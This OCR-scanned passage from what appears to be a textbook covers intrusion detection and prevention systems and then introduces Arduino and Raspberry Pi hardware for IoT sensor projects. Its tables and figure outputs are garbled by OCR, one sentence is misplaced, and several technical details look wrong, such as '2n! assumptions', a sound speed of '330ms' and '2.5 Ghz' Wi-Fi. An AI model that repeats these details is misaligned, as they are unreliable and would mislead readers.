tions are carried out based on already observed behaviours in real-time. 
Application layer attacks like malware intrusion, password cracking, and 
DoS attacks are detected through the analysis of numerous protocols like 
DNS, FTP, HTTP, SMTP, etc. Attacks with spoofed IP addresses are rec- 
ognized by analyzing network layer protocols like IPv4 and ICMP. These 
IDSs can detect policy violations too. 


7.2.2.1.3 Limitations 

Inside the host machines, NIDS has very limited visibility. Ideally, the NIDS 
should be installed where detection has to be done before encryption or 
after decryption. It is so because the Network-based IDSs are not able to 
detect threats where the network traffic is encrypted. Another drawback is 
that in case of heavy load and large traffic, these IDSs are not as effective. 
In fact, then they become vulnerable to many attacks. 


7.2.2.2 Host-Based IDS 


7.2.2.2.1 Network Architecture 

Compared to the Network-based IDSs, the Host-based ones have fairly easy 
deployments. Usually, there is no requirement of a separate management 
network as the detection software of these IDSs (also called Agents) is put 
up with the hosts in exactly the same network. These agents are installed 
in line with the host that is to be protected. For example: In the case of 
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appliance-based agents, the IDS consoles could be erected in line with the 
router, switch, and firewall. 


7.2.2.2.2 Data Collection and Detection Capabilities 
Each agent monitors a single host which could be a desktop or an applica- 
tion like a database program or a server's operating system. For example, 
some HIDSs like Snort and Dragon Squire monitor a specific computer 
system [16]. The HIDS is usually deployed in the case of critical and sensi- 
tive servers. Just like NIDS, these also operate with a wide range of logging 
of data. Some data fields that are logged are the type of alert, IP addresses, 
source and destination of ports, timestamp containing date and time, etc. 
The Host-based systems are able to observe unencrypted activity if 
placed at the endpoints, something which other detection technologies like 
the NIDS are not able to offer. They function with an efficient combination 
of signature as well as anomaly-based techniques. They can analyze and 
filter both wireless and wired network traffic and code. HIDS monitors 
changes in the host kernel, host file system, and the program behaviour 
[17]. Files shared over the web and emails too can be examined. Some 
HIDS agents can also clean the network traffic that they encounter. Some 
can even monitor audio-video devices like cameras or microphones to 
detect an attack. 


7.2.2.2.3, Limitations 

Since alerts are not reported on a real-time basis to a centralized manage- 
ment server, delays are frequent. Such delays mean that any event with 
rapidly spreading malware could pose a daunting situation. This, however, 
is not the case with smaller networks. Another drawback is the significant 
consumption of the host’s resources by the agent deployed to protect it. 
This consumption is manifested in the form of processor use, memory, and 
storage. Again, as few detection techniques are done periodically, there is 
a possibility for the attack to creep in between two successive detections. 


7.2.3 Intrusion Detection Techniques 
7.2.3.1 Conventional Techniques 


The techniques that have been conventionally employed in intrusion 
detection are known as conventional techniques. These detection tech- 
niques are reliable to their users but are lacking in one critical aspect: they 
cannot detect new or foreign threats. Thus, new attacks are prone to get 
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penetrated despite their being in place. But a significant advantage is that 
they are extremely capable of detecting known threats. The techniques can 
be divided into three broad divisions: 


i. Rule-based: Certain rules are decided beforehand and the 
data is traversed across this set of rules performing cer- 
tain specific functions. Data that fail to satisfy the rules 
are restrained by the intrusion detection system. These 
rules need to be updated by the administrator regularly. 
Though it efficiently detects known attacks, the rule-based 
intrusion detection cannot shield against foreign and new 
attacks. An important advantage is that the number of 
false alarms is lower. An efficient approach to go with is 
the State Transition Analysis where initial secured state 
and later compromised states are presented. 

ii. Signature-based: This intrusion detection is also known 
as misuse detection system. Within the analysed data, the 
signature-based detection system looks for patterns or 
signatures. It has a lot of signatures that are significant for 
catching the threat at the outset. The same is already col- 
lected in a repository of known data. This repository acts 
as a database of malicious threats. Thus, the unacceptable 
patterns are compared with network traffics and alerts. 
Unlike the anomaly-based methodology, this does not need 
to learn the environment and hence is easy to deploy [18]. 

iii. Anomaly-based: This is also called profile-based intrusion 
detection. In anomaly-based detections, just as the name 
suggests, the IDS looks for anomalies and works against a 
baseline profile depicting any known normal behaviour. 
That could be a pattern of any activity that reflects a signif- 
icant deviation from the behaviour otherwise considered 
normal. The anomaly-based detection can shield against 
novel attacks. Thus, unforeseen vulnerabilities can be effec- 
tively tackled by this technique. For example, it can spot 
a malformed Internet Protocol (IP) and new automated 
worms [19]. For comparing with existing data sets, a lot of 
information needs to be fed. It has an acceptable accuracy 
but a crucial downside is that the number of false alarms is 
very large. 


Figures 7.6 and 7.7 below represent the Signature-based and Anomaly- 
based techniques, respectively. 
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Figure 7.6 Signature-based technique. 


Figure 7.7 Anomaly-based technique. 
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Table 7.1. Comparison of conventional intrusion detection techniques. 


[Retains [Baie Advnigs [Dinan 


Rule-based | It is based on The number of Only previously 
predefined rules false alarms known attacks 
and those stored produced is are detected. 
in database. less. Rules must 

Familiar attacks be updated 
are detected regularly. 
better. 


Signature- | It is based on The rate of false Previously 
based signatures that positives is unknown 
are pre-existing low. attacks cannot 
in database. be detected. 


Anomaly It is based on Unknown attacks | A lot of false 
deviation are detected alarms are 
from normal better. generated. 
behaviour. It is easily 

configured. 


Table 7.1 gives a comparison of the above three techniques. 


7.2.3.2 Machine Learning-Based and Hybrid Techniques 


In Machine Learning models, the aim is to establish an implicit or explicit 
model. Although they are resource expensive in nature, such schemes 
can modify their execution strategy just as new details are acquired. The 
hybrid methodology (as shown in Figure 7.8) works with a combination of 
two or more methodologies. This means that the strengths of each of the 
individual methodologies are incorporated into one. For example, when 
an Anomaly-based engine to filter the data is combined with a Signature- 
based engine which detects the intrusions, the outcome is a hybrid detec- 
tion system. Interestingly, the general architecture of many Hybrid IDPSs 
imitates the human immune system [20]. This gives us a better system that 
has a high accuracy rate and can give very sound protection against new 
attacks. 


i. Bayesian Network 
Bayesian Theory has been named after Thomas Bayes. 
When the Bayesian Probability model is heavily simplified, 
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Figure 7.8 Architecture of hybrid-based methodology. 


ii. 


the outcome is a naive Bayes model that performs well. For 
a given situation, Bayesian networks can obtain a coher- 
ent result from probabilistic relationships. The Bayesian 
IDS is made of a naive Anomaly-based Bayesian classifier. 
The Bayesian filter contains a training engine and a testing 
engine [21]. 

For a series of n attributes, the classifier makes 2n! 
assumptions. Since these assumptions are independent, 
the probability of one does not impact that of another 
attribute [22]. Once the filter is trained, it can classify a 
TCP connection as either an attack or regular traffic. A 
drawback is that results depend heavily on these assump- 
tions which can sometimes deviate and cause error [23]. 
Markov Models 
Within the Markov models, there are two varieties. The 
first one is Markov Chains and the next one is Hidden 
Markov Models (HMMs). Both these techniques find wide 
application in a Host-based intrusion detection system. 
A classifier first segregates normal and abnormal traces 
and then the Markov Chain is built upon the set of nor- 
mal traces [24]. A set of states that are connected through 
some transition probabilities is known as a Markov Chain. 
Afterward, the anomaly score for the observations is com- 
puted by comparison with some fixed threshold. In the 
Hidden Markov Model, only productions are visible while 
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iii. 


iv. 


the states and transitions are hidden. IoT services in smart 
cities are of great interest; they are implemented not only 
for human welfare but also to reduce the operational costs 
in administration. 

Genetic Algorithms 

While no previous knowledge about the system behaviour 
is taken up, this machine learning-based detection tech- 
nique is able to select the optimal features for the detection 
process [25]. The genetic algorithms, as the name suggests, 
are conceptually inspired by the principles of evolutionary 
biology. Thus, the naturally observed processes of inher- 
itance, natural selection, mutation, and recombination 
form the underlying core of the intrusion detections in 
this methodology. The biggest advantage of this technique 
is that it solves in a multi-directional manner, making effi- 
cient use of its strong global search method. 

Artificial Neural Network 

The neural network derives its fundamental footing from 
the human brain and nervous system. Somewhat like our 
nervous system that consists of billions of neurons and 
trillions of synapses to get us functioning every second, 
the neural networks simulate a similar approach in the 
field of intrusion detection. An artificial neural network 
works upon the disadvantages of conventional IDSs like 
their time taking analysis, non-adaptability, need for reg- 
ular updates, etc. It can recognize the intrusive nature of 
traffic patterns as well as create user profiles [26, 27]. 
Fuzzy Logic 

The fuzzy logic approach is used by a Fuzzy Intrusion 
Recognition Engine (FIRE) which is an anomaly-based 
intrusion detection system. It has a Network Data 
Collection system that is capable of collecting data from 
the data input for a given interval in order to detect any 
intrusions. It has been effectively utilized in port scans and 
probes. In the main IDS program, the fuzzy logic section 
is usually employed to manage the vast inaccuracies of the 
input data. The Fuzzy technique makes use of fuzzy vari- 
ables under the Fuzzy set theory where the reasoning is 
approximate and not precise in nature. A fixed interval is 
demarcated in the processing scheme beforehand which 
would identify an observation as being either normal or 
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abnormal [28]. A significant drawback is its huge resource 
consumption. 


7.2.4 Three Considerations 


Years of cumulative researches and experiences have shown that even the 
safest systems are vulnerable to computerized thefts, break-ins, and viruses 
[29]. An Intrusion Detection System, as opposed to the firewalls and tra- 
ditional access control methods, allows detection and assessment of the 
damage caused on a real-time basis [30]. Improvisation in technology and 
the administrative acumen to utilise them have certainly impacted the pro- 
cess enormously. In this section, three such considerations are discussed: 
location of sensors, security capabilities, and management capabilities. 


7.2.4.1 Location of Sensors 


This is a most crucial decision. As administrators decide on having the 
most suitable network to set the components right, they have an addi- 
tional task to determine a suitable location for sensors. It is always desired 
and acceptable to have passive sensors in place, for instance in the case of 
NBAs. These passive sensors effectively perform meticulous monitoring of 
the direct network. 


7.2.4.2 Security Capabilities 


The security capabilities offered by an Intrusion Detection and Prevention 
System are truly vast and extensive. Gathering of information, logging, 
prevention, and detection capabilities are the four most crucial functions 
that an IDPS performs. These functions are as described below. 


7.2.4.2.1 Gathering of Data 

The first and most fundamental step is the collection of information. A 
huge quantity of data from source and networks is generated and gath- 
ered from operating systems as well as the hosts after it is identified that 
they could be potential mischief-mongers. Large volumes of data that are 
fuzzy, noisy, and dynamic are analysed. The involvement of Data Mining 
has added a new dimension to the analysis of large quantities of data [31]. 
Information is collected to be pre-processed to remove the noise. As a first, 
the irrelevant stuff is replaced while the rest of the data is analysed and 
bundled. 
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7.2.4.2.2 Logging 

After collection, extensive logging of data is performed and the logs are 
stored either locally or centrally. These logs are crucial in the sense that 
they allow the administrator to validate the authenticity of alerts and estab- 
lish a correlation among detected threats. This serves as a massive database 
where the data fields are also equally important. The data fields which are 
generally logged in Network Behaviour Analysis include date and time, 
estimation on the severity of threats, prevention and impact of threats, net- 
work, transport and protocols of application layer. It is preferable to store 
them locally as well as centrally. When stored on local servers, the copies of 
logs are usually forwarded to the centralized security servers as well. 


7.2.4.2.3 Threat Detection 

A combination of techniques is generally used by a typical Intrusion 
Detection and Prevention system. Mostly anomaly-based detection is used 
as opposed to the signature-based detection. This is especially true for the 
NBAs. It is the tuning and customization capabilities that greatly deter- 
mine and largely differentiate one detection technology from the other. 
Using a combination of techniques facilitates greater flexibility in the tun- 
ing and customization domain. 

There are two types of detection methodologies. These are Knowledge- 
based detection and Behaviour-based detection. For it to be Knowledge- 
based detection, the IDS should be utilizing some sort of misuse detection, 
while Behaviour-based detection implies that Intrusion Detection follows 
the path of anomaly detection [32]. Following are the most common detec- 
tions that are usually observed. 


i. Alerts: Alerts are the signals generated whenever a poten- 
tial threat is detected by the IDS. Alerts can be flexibly 
designed as per the needs of the administrator and the 
demand of the networks. Thus, default settings regarding 
the severity and the type of information needed can be 
made. Basically, alerts are also switched between ‘ON’ and 
‘OFF: 

ii. Blacklists: Blacklists allow the detection system to recog- 
nize all those activities which have been previously flagged 
as dangerous. Thus, malicious events can be identified 
quickly using this feature. The URLs, filenames, appli- 
cations, ICMP codes, TCP, or UDP port numbers are 
some of the entities that are detected in a bid to establish 
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a connection between the current sample and an already 
recognized malicious activity. It relies heavily on the 
detection of characteristics akin to that of malware [33]. 
Signature-based detections usually go with Blacklists. 

iii. Whitelists: Contrary to blacklists, this list includes a num- 
ber of conducive and agreeable entities, such as discrete 
entities from verified hosts. Signature-based detections 
usually go with Whitelists along with Blacklists. They are 
important in the sense that the number of false positives 
can be reduced with the help of such a list in place. These 
should be checked by the administrator and updated 
regularly. 


7.2.4.2.4 Prevention of Threats 

Usually, there are a variety of prevention capabilities provided to any IDPS. 
The administrator has also got a plethora of roles to decide which of the 
multiple prevention capabilities is to be used, depending upon the type of 
alert. Prevention mostly comes into the picture when the system is about to 
detect a new threat. IDPSs also let the administrators specify the configu- 
ration for each form of an alert. Some of the general prevention capabilities 
are [34]: 


i. Ending TCP session: This is the passive-only approach. In 
this prevention method, the sensors end the TCP session 
currently in operation [35]. 

ii. Inline firewall: This is an active approach wherein the 
inline sensors impose an outright rejection of events that 
appear to be malicious in intent. 

iii, Administrator's program: An administrator can impose 
its script on sensors such that they operate this program 
under certain specific situations. 

iv. Both passive and inline approaches: Sensors in the Network 
Behaviour Analysis are empowered enough to push the 
network’s security devices like routers and firewalls to 
block suspicious activity through their reconfiguration. 


7.2.4.3 Management Capabilities 


After security capabilities have been assessed and the location of sensors 
determined, management comes into the picture. Implementation as well 
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as operation and maintenance are the prime aspects of management. We 
briefly look at these below. 


7.2.4.3.1 Implementation 

The IDPS product needs to be chosen wisely as the first step. Thereafter, an 
efficient network architecture is designed by the administrator. Testing of 
components for operation and security is done to ensure that everything is 
fine before the organization deploys that IDPS product. While deploying 
the sensors, it is tried that they are deployed within the minimum time gap. 
This is especially important as there is no need for these sensors to have 
different sets of inventories. This helps to keep up with the initial baseline. 


7.2.4.3.2 Operation, Updates, and Maintenance 
A console is that Graphical User Interface (GUI) or Command Line 
Interface (CLI) that has been entrusted with the task of operation and 
maintenance of the IDPS products like sensors and management servers. 
Even the updating and configuring of sensors are attributed to the console 
itself. Consoles also carry out the herculean task of analysing the reports 
and data generated by the detection system. 

Sensors, console, and management server need to be regularly given soft- 
ware updates. Appliance-based IDPSs like the NBA can be updated fairly sim- 
ply by rebooting the sensor, inducting the software, or even changing the CD. 


7.2.5 Administrators’ Functions 
7.2.5.1 Deployment 


The administrator has various roles at all stages while bringing the whole 
methodology into action. First, an IDPS product needs to be chosen. Once 
that is done, the network architecture needs to be designed. Next up, the 
deployment of the IDPS is done after ensuring a secure environment. The 
deployment of IDS in a large majority of corporate networks requires it to 
be scalable. 


7.2.5.2 Testing 


Care must be taken to examine the operation of the product in a test envi- 
ronment. This substantially reduces the problems during implementation. 
Again, operationalizing too many sensors at once can overwhelm the serv- 
ers by producing tons of false positives. Care needs to be taken here as well. 
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7.2.5.3 Security Consideration of IDPS 


Ensuring the safety of the IDPS should be the topmost priority since it 
contains sensitive data and is often on the attackers’ radar. If the IDPS gets 
attacked, the whole underlying system would become vulnerable. Direct 
access to IDPS should be limited, and strong authentication measures 
should be undertaken. There should be separate accounts for users and 
administrators. Additional protective layering like a virtual private net- 
work (VPN) can also be incorporated to minimize traffic. 


7.2.5.4 Regular Backups and Monitoring 


Administrators are also required to back up the configurations periodi- 
cally. They have a continuous job of monitoring security issues and vulner- 
abilities. They need to be supportive yet cautious of updates in the IDPS. 
Starting from the decision of employing the sensors at just the right place 
to further performing tuning and customization, the administrator has a 
binding influence throughout. 


7.2.6 ‘Types of Events Detected 


i. DOS and DDoS Attacks 
The denial of service and the distributed denial of service 
attacks are fairly common detections. In this, the usage of 
bandwidth increases substantially. Distributed Denial of 
Service (DDoS) attacks are easily prevented by the denial 
of the capability approach. First of all, the legitimate traffic 
is segregated from malicious traffic and afterward the per- 
formance of legitimate traffic is reduced slowly. 

ii. Worms 
Worms are fairly common detections. They are detected 
comparatively easily as they tend to get those hosts com- 
municating with each other which normally they do not. 
They multiply and spread pretty fast. These worms use 
large bandwidth and some even start performing scan- 
ning. This helps the IDPS in catching them. 

iii, Scanning 
Scanning can be distinguished from others by their con- 
trasting flow styles observed at the application, transport, 
and network layers [36]. Banner grabbing at the applica- 
tion layer, TCP, and UDP port scanning at the transport 
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layer and Internet Control Message Protocol (ICMP) scan- 
ning at the network layer are some common examples. 

iv. Policy violations 
Administrators lay down firm and extensive policies that 
give an account of details that are concerned with permis- 
sions. Thus, the time of activity and the type of hosts and 
the forms of interaction are already specified by the admin. 
If any of this is found to be violated, for instance, the pres- 
ence of an unauthorized host, then the IDPS detects a pol- 
icy violation. 

v. Bots 
Botnets have recently become one of the primary threats 
to computer networks. A self-propagating application in 
nature, bots impact vulnerable hosts [37]. For their pur- 
pose to succeed, they could either employ Trojans or go for 
direct exploitation. These assume command and control, 
unlike malware [38]. 

vi. Forbidden applications 
Some application services as well as application protocols, 
backdoors, and tunnel protocols come under this category. 
The event occurring in this segment is checked against the 
expected protocols. 


7.2.7 Role of State in Network Security 


A state has tremendous amounts of information that it juggles daily. Since 
the dawn of the digital era, while bidding adieu to paper modes, the com- 
puter networks have often been vested with overwhelming responsibilities. 
In disciplines like defence, communication, energy, etc., data has assumed 
a stellar role, which also points to more vulnerability. 

Thus, it becomes a necessity for the state to come up with solid regula- 
tions and protocols in place that adhere to industry standards. 

The government has been focussing with renewed vigour on the devel- 
opment of state standards and criteria. For example, the DOD 5200.28- 
STD trusted by NCSC enforces objective evaluation of computer security 
[39]. Here, predefined thresholds are strictly adhered to, which if found 
exceeding, leads to termination of the event. There is a lot of scope for the 
state’s facilitation of research in adjoining areas like IDPS environment and 
security, social and operational aspects of intrusion detection, and novel 
detection methods [40]. 
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7.3 Literature Review 


In this section, some of the works done in the field of Intrusion Detection 
and Prevention Systems will be reviewed, major researchers have given a 
lot of breakthroughs with the usage of IDPS in terms of security; however, 
more work is expected in the field, and this review hopes to motivate read- 
ers to pursue their interest in the field. Radoglou and Sarigiannidis [41] 
used IDPS technology in order to secure the smart grids being used in the 
smart city infrastructure’s electrical grid; with increased reliability in the 
power grid, the smart city will be more efficient, economically and socially 
as well. 

Baykara and Das [42] proposed a honeypot-based approach for improv- 
ing the existing system of IDPS. The main usage of honeypot helped the 
system to gain real-time access of the data, with low-cost management and 
management of the system. This setting of the IDPS allowed itself to detect 
the zero-day attacks in real time. 

Tan and Sherwood [43] presented an improved version of string match- 
ing algorithm for the IDS systems in order to improve the speed of the sys- 
tem without having to go through crashes or unintentional system drops. 
Their experiment was based on converting the large amount of strings into 
tiny state machines, in which each of them work on a single rule, hence 
improving the overall complexity. 

In order to prevent Supervisory Control and Data Acquisition (SCADA) 
from data frauds and breaches, Zhu and Sastry [44] presented the taxon- 
omy of the techniques that can be used to prevent such attacks, in which 
IDPS is also a key participant. They presented the voids and defects with 
the IDPS system and motivated researchers to further improve the system. 

More et al. [45] presented an architecture for the system of IDPS to 
work in a manner that can correlate heterogeneous data sources using the 
cross-referencing features of the signature-based IDPS. The major out- 
come of their experiment was a knowledge base which is being used to 
model other systems for detecting cyber-attacks and vulnerabilities. 

Patel et al. [46] worked on improving the anomaly detection in IDPS, 
by proposing a self-managed agent-based approach which assess the risk 
management as well, using the Autonomic Computing (AC) principles of 
self-management. This method will help in not just the detection, but the 
stopping of the attack before the system is critically damaged. 

Ribeiro et al. [47] proposed an android-based solution for the IDPS, 
termed as HIDROID, which does not provide any complexity on the mobile 
system. The model used in the application is made for the detection of 
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Table 7.2 Summary of literature review. 


Radoglou and Smart Grid Efficiency 
Sarigiannidis 
[41] 

Baykara and Das__| HoneyPot Detects the zero day 
[42] attacks in real time 

Tan and String Matching | Improving the overall 
Sherwood [43] in IDPS complexity 


More et al. [45] Signature based Correlation of 
IDPS heterogeneous data 
sources 


Patel et al. [46] Anomaly Stopping of the attack 
detection in before critically 
IDPS damaging the system 


Ribeiro et al. [47] | HiDroid Application is a 
self-learner 


benign behaviour. Their application is a self-learner, and does not require 
much interaction with malicious data to learn about the anomalies. This 
application provided an accuracy of up to 0.9 in ideal situations. 

The work done in the field has been summarized in Table 7.2; it majorly 
talks about the current open challenges that can be faced by the current 
researchers of the field. 


Zhu and Sastry SCADA Prevention from data 
[44] frauds 


7.4 Conclusion 


A substantial amount of research is going on in the field of Intrusion 
Detection. By no means should this be considered an exhaustive solution 
at its present position. Suffice to say that developments in this field are at a 
nascent stage and there is a lot of scope for further changes and develop- 
ment. Spreading awareness about data security, sensitizing the masses, and 
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encouraging organizations to devote a part of their resources towards safe- 
guarding their computer networks and data, is the need of the hour. Timely 
and appropriate interventions by the state along with civilians would prove 
to be pivotal in this direction. 
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Abstract 

Sensing any environmental conditions and acting on behalf of it is the basis of IoT 
Technology. One might wonder how physical parameters can be changed on the 
basis of only sensing, but that’s the most attractive part of IoT technology. Imagine 
the milk jug in our refrigerator telling us through an application notification that 
the milk is about to run out and we should refill it, or even the milk jug sending 
signals to the milk vendor to come to the house to refill it. It sounds unrealis- 
tic, but that’s what Internet of Things (IoT) technology can create. Imaginations 
are the wisdom that encompass human satisfaction level. There are many hard- 
ware devices which are compatible with IoT. Their working part is discussed here 
regarding the Arduino and Raspberry Pi hardware which have equal capability 
of inventing new unimaginable horizons in IoT. These devices can be used for 
numerous applications within IoT. The whole architecture consists of sensor data, 
clouds, processing, notification. 


Keywords: BLE, LPDDR, REST, HTTP, WiMAX, GPIO 


8.1 Introduction 


Integrating with IoT is possible with a few hardware devices such as 
Arduino and Raspberry Pi hardware which are equally capable of invent- 
ing new unimaginable horizons in IoT. Arduino is an actuator or a small 
microcontroller sort of device whereas Raspberry Pi is a mini computer. 
The basic difference between the two lies in the computational power and 
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different work capacities involved. Moreover, Raspberry Pi is a bigger sub- 
set which engulfs Arduino too. Discussing both, a methodology should be 
devised to gain maximum insights into their computational abilities and 
how they can transform the IoT industry. 

The whole architecture of IoT involves sensors, actuators, cloud, data 
processing, gathering analytical data, sending automatic updates and noti- 
fying users of any aberration. For example, opening a garage door, the 
sensors can sense the environmental changes (Proximity sensor) and then 
send data to the actuator which are mechanical in nature (motor) and they 
act on those changes as instructed. This small work structure can be com- 
pleted using an Arduino device. 

As in the case, for example, of weather monitoring, when there is a lot 
of data and complexity involved or bulk data processing and filtering, then 
the Raspberry Pi hardware device is used. The sensors can send all of the 
data to the cloud as the data is heavy (regular monitoring) and needs a lot 
of filtering and analysis to be done before any useful data can be fetched 
out. This scenario needs a full IoT infrastructure to thrive including clouds, 
processing center, analytical center, etc. 

Currently, in market, there are many applications where IoT finds a 
suitable use. These applications include the Medical field, Health domain, 
Agriculture production, Weather Monitoring, Surveillance, Machine 
learning models, Smart cities, Satellite communications, etc. There is vast 
usage of IoT devices for increasing the efficiency and accuracy of gadgets 
and therefore helping humanity in many ways. This was my motivation in 
compiling this chapter. 

IoT has proved itself capable of shaping the future of the digital world. 
In the sections below, IoT-compatible hardware devices, case studies with 
real-life application scenarios, drawbacks of IoT technology and challenges 
in IoT infrastructure are discussed. 


8.2 Literature Review 


Below are some of the research papers that had done work similar to what 
I am proposing in this chapter. 

In [1], Air quality measurement is discussed. Increasing population lev- 
els have led to a decrease in air quality, which leads to detrimental effects 
on our body. Poor air quality is the main propellant for chronic diseases. 
The main substance is carbon monoxide, which can be measured by sen- 
sors and then remotely monitored by devices at home and also at public 
places. The updates can be pushed to the subscriber. 
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In the paper, Arduino and Raspberry Pi are used to measure the soil 
moisture content of plants with the help of HTU 211D sensor element. 
The sensors are used for measuring the temperatures from the surround- 
ings and storing displayed information. In this ESP8266 Wi-Fi module has 
been used for data storing purpose [2]. 

An IoT-based patient health monitoring system enables the doctor 
to get regular health-centric updates about the patient with the help of 
Raspberry Pi connected to the server with internet. A patient's health sta- 
tus can be monitored by device/sensor deployed with the patient and all 
health parameters are sent to the doctor’s mobile application or to a central 
server with proper authentication. This is loT-based remote technology for 
medical treatment for patient [3]. 

In this paper, Raspberry Pi acts as a sensor node and a centrally con- 
trolled controller. Hardware devices integration loT has become the most 
versatile platform for various application services. Here, the Raspberry Pi 
is used to develop this, because it works as a sensor node and as a control- 
ler. In this paper, a health monitoring system has been proposed [4]. 

In the present work, an IoT-based real-time energy monitoring system 
is created to monitor and control a switch gear industry need. Daily energy 
needs of an industry are monitored and a summative assessment is sent to 
the server for analysis to be done for future supply [5]. 

In the paper, an affordable IoT-based solution is discussed that will 
increase COVID-19 indoor safety. The aspects which it will cover are 
contactless temperature sensing, mask detection and minimum distance 
maintained between individuals. The temperature sensing will be done 
automatically by infra-red sensors, and the other two activities will be per- 
formed by Raspberry Pi-enabled computer vision techniques [6]. 

Continuous monitoring of crops is indispensable for the cultivation of 
agriculture. A new AGRO IoT system is developed where an automatic 
mirroring and reconfiguration of remote monitoring system is deployed. 
The functionalities it will support is lessening the downtime and efficient 
utilization of computational resources availability [7]. 

In the paper, an automatic weather monitoring system is discussed 
which will regularly note the weather-related data values of a location along 
with all the parameters like temperature, humidity, pressure, and breeze 
velocity, and then relay these values to a centralized server or database to 
help monitor analytic data over a period of time. The system also includes 
wireless technology, electronic devices and sensors [12]. 

This below paper provides IoT-oriented comparison of various boards 
with suitable selection of the hardware development platforms that are capa- 
ble enough to improve the understanding of technology, and methodology 
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to facilitate the developer’s requirements. This paper also summarizes var- 
ious capabilities of available hardware development platforms for IoT and 
provides a method to solve real-life problems by building and deployment 
of powerful Internet of Things notions [13]. 

The above literature review discusses the application concerning deploy- 
ment of different oT hardware modules and integrating them within IoT 
architecture to regularly fetch all the desired updates on our local (app) 
and centralized server. 


8.3. Component Description 


The hardware devices which can be integrated with the IoT infrastruc- 
ture are found in abundance. The most prominent ones in the market 
are Arduino and Raspberry Pi. While Arduino is used for completion of 
smaller and repetitive tasks, Raspberry Pi is used for bigger and more com- 
plicated, difficult work. It’s also called a mini computer and is a credit card- 
sized device. Below, both devices are discussed in more detail. 


8.3.1 Arduino Board UNO 


In Figure 8.1, an Arduino Board UNO has been shown with nos. depicting 
its PCB layout [1]. In the points mentioned in the picture, 1 is the USB 
port; it loads the code into the Arduino board, 2 is the barrel jack, 3 is 
ground point, 4 and 5 are input voltage pins of 5V and 3.3V, respectively. 


7/8~ 


Figure 8.1 Arduino UNO board. 
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6 stands for six analog inputs (A0-A5), for example in case of input from 
temperature sensor. 7-8 stands for pins numbered from 0-13, that is 14 
digital pins used for both input and output. 9 is for analog reference point. 
10 is for reset button, which erases all code on the device and is available 
for new code again. 11 shows LED ON, if Arduino is powered by a source. 
12 indicates TX and RX, which shows when our device is transmitting data 
and receiving data, respectively. 

13 shows IC (horizontal black with many legs) which stands for 
Integrated Circuit. 14 controls the amount of voltage to be let in the 
Arduino board. There are many other small parts in the Arduino board 
but those are beyond the scope of our domain. 


8.3.2 Raspberry Pi 


Another hardware device, which is depicted in the figure below, is 
Raspberry Pi. It is a small mini computer with a 4GB processor. It has a 
conventional Wi-Fi, Micro SD card, USB port [9] and GPIO with camera 
ports too. It is also used for connecting sensors data with cloud technology. 

In Figure 8.2, the Raspberry Pi 4 components description is provided 
[2]. The Broadcom CPU handles all computations and GPU handles all 
graphical output. The LPDDR is Low Power Double Data Rate, specially 
for mobile computers. The frequency is 1.5 GHz and RAM is 4 GB. The 
USB ports are used to connect it to laptop or other source. An Ethernet 
port is used for internet. A video port is also available at the bottom side 
next to a camera port. Next to that are HDMI ports for high-definition 
networking. A 5V power input is also provided. 


Extended 40-pin GPIO Header Broadcom BCM2711B0, 
[additional - 4x UARTS, 4x SPI, 4x [2C] » 1.5GHz 64-bit quad-core Cortex A72 
processor 


LPDDR4 SDRAM [1GB, 2GB, 4GB] 


Dual Band WiFi pert 
(2.5GHz & 5GH2) Tee stearate 
IEEE 802.11.b/g/n/ac & Pee HAT . 
Bluetooth 5.0 (BLE) Ethernet Controller 
DSI Display port 2x USB 3.0 ports 


Micro SD port for OS =sss==t» USB Controller 


& Storage (Back Side) 
2x USB 2.0 ports 
5V@3A USB-C Type 

Power Input 


4-pole stereo output and 


Dual micro-HDMI ports, ee 
composite video port 


Single - 4K60fps 
Dual — 4K30fps CSI Camera Port 


Figure 8.2 Raspberry Pi 4 board. 
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A micro-SD port for OS and also storage is shown. Two bands Wi-Fi at 
2.5 Ghz and 5 Ghz, along with BLE (Bluetooth Low Energy) technology 
port is shown. GPIO stands for General Purpose Input Output port. The 
processor is 64-bit quad core Cortex A72 processor. The kind of exper- 
imental setup that can be achieved using these two components will be 
discussed herewith. 


8.4 Case Studies 


The different sensors data are used in many applications as explained in the 
sections below. Some of the few sensors, their working, connections, code 
and output are briefly described. 


8.4.1 Ultrasonic Sensor 


There are many varieties of sensors used to measure physical attributes. 
One such sensor is ultrasonic sensor. It sends ultrasonic sound waves and 
they touch any hard surface and reflect back in forms of an electrical signal 
which is gathered by the sensor. Their range is 40-70 KHz. 

Here, in this experiment, distance is being measured between two points 
using ultrasonic sensor. The logic behind this is that the sound waves (high 
frequency) will be emitted from the source/emitter and then they will 
touch the nearest straight obstacle and then return. The time taken by the 
rays can be noted and also the speed of rays (330ms) is known beforehand. 
So, by observing both things and putting in formula, Distance = Speed X 
Time. 

One thing to note is that the distance here travelled is double as the rays 
are hitting the obstacle and then coming back too. So, finally it should be 
divided by two to get actual distance. So, this can be worked out by down- 
loading and installing Arduino IDE on our personal system. Open and run 
it. The hardware needed are Arduino uno, breadboard, jumper wires, USB 
connector, personal system, and ultrasonic sensor. 

In breadboard connect ultrasonic sensor with jumper wires. The back 
side pins of sensor: (in breadboard vertical connections (in between) are 
there). VCC should be connected to 5V in Arduino board, trig to pin 13 of 
digital in of Arduino. Also, Echo to pin 12 of digital pin of Arduino. Gnd 
to Gnd of Arduino board. Connect USB from laptop to Arduino as shown 
in Figure 8.3. 

Once it is connected, the code should be run in Arduino sketch (code 
writing area) [1]. To verify our code in Arduino IDE that is sketch. Upload 


HARDWARE DEVICES INTEGRATION WITH IoT 


Figure 8.3 Connections of ultrasonic sensor for measuring distance. 
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Figure 8.4 Distance readings. 
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our code in sketch. After connecting all things, press Ctrl + shift + M, can 
see output window. 

So, here from Figure 8.4, it can be inferred that, in the output, the first 
distance is in inches and the second one is the equivalent cm; it shows the 
nearest straight obstacle’s distance from the sensor on the Arduino board. 


8.4.2 Temperature and Humidity Sensor 


Applications where weather monitoring is done using IoT devices, different 
sensors are required. The sensors like DHT11, which measures tempera- 
ture and humidity, are deployed at nodes and they capture the environ- 
mental conditions remotely and send data to the cloud or server regularly. 
Here, in this experiment, the measurements of environment parameters 
are measured, namely Temperature and Humidity. Following the same 
procedure that was followed for measuring distance in Arduino IDE, it can 
be set up and the code below measures temperature and humidity values. 

Please note that it is a safe process to explicitly download the DHT 
library in IDE. DHT is the sensor name for measuring the environment 
parameters. 


Figure 8.5 Connections for measuring temperature and humidity. 
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Humidity (%): 53.00 


Temperature (C): 33.00 


Temperature (C): 33.00 


Humidity (%): 53.00 
emperature (C): 33.00 


dumidity 5255-00 
femperature (C): 33.00 


Figure 8.6 Output measurements in Arduino IDE. 


